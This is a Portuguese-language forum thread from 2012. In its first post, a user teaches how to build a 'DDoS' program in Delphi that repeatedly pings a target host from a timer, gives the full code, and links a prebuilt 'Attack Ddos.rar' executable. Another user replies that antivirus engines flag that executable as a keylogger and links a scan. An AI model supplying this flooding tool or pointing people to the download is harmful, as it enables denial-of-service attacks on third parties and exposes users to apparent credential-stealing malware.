Postado Julho 24, 2012 12 anos Eae Jovems!! Venho aqui ensinar a vcs fazerem um programa ddos com ping em delphi. Vamos precisar de: ,1timer,2edit,1SpinEdit,1checkbox,1memo,1IdIcmpClient, 1buttom, Em private voce coloca: function EstaVivo(IP: String): boolean; Declare abaixo de {$R *.dfm}: function TForm1.EstaVivo(IP: String): boolean; begin with IdIcmpClient1 do begin Host := IP; ReceiveTimeout := 500; Ping; if ReplyStatus.BytesReceived > 0 then result := true else result := false; end; end; Der 2 clique no IdIcmpClient e adicione o seguinte código : Memo1.Lines.Add('Derrubando :' + (edit1.Text) +' Bytes Sendo Enviando : '+ IntToStr(AReplyStatus.BytesReceived )); Clique no IdIcmpClient depois em "events" der 2 click no Onstatus e adicione o seguinte código : Memo1.Lines.Add(AStatusText); Der 2 Clique no checkbox e Adicione o código : if CheckBox1.Checked = true then begin Edit1.Enabled := false; SpinEdit1.Enabled := false; Timer1.Enabled := true; end; if CheckBox1.Checked = false then begin Edit1.Enabled := true; SpinEdit1.Enabled := true; Timer1.Enabled := false; end; De dois click no Button e coloque isso: if EstaVivo(Edit2.Text) then ShowMessage('Online') else ShowMessage('Offline'); e por ultimo deixe o enabled do timer em false é interval 100 quanto menor mais rapido, É de 2 clique no timer e adicione o código : IdICMPClient1.Port := SpinEdit1.Value; IdICMPClient1.Host := Edit1.Text; IdICMPClient1.Ping(); O meu ficou assim: Pra quem nao conseguiu fazer é que um programa ddos vou coloca o meu para download Abaixo. download:Attack Ddos.rar
Postado Julho 24, 2012 12 anos Dois antivírus acusando de keylogger. Se o executável realmente segue o tutorial, deveria postar os arquivos source ao invés do próprio executável. 2 posts com arquivos suspeitos em um dia.
Postado Julho 24, 2012 12 anos Autor cara vc denovo entao se ta cheio de keylogger como vc ta acusando ai sem saber completamente de nada parese que numca uso delphi segue o tutorial faz ai passa no virus total e me diz o que apareseu. Porque isso ai sao para o funcionamento do aplicativo.
Postado Julho 24, 2012 12 anos Eu já havia feito o scan, amigo. https://www.virustotal.com/file/2be70562e667846a7860d68fd3fcba30ee501f35e638e4b53cf788ffa727fc38/analysis/ "Isso aí é para o funcionamento do aplicativo"
Participe da conversa
Você pode postar agora e se cadastrar mais tarde. Se você tem uma conta, faça o login para postar com sua conta.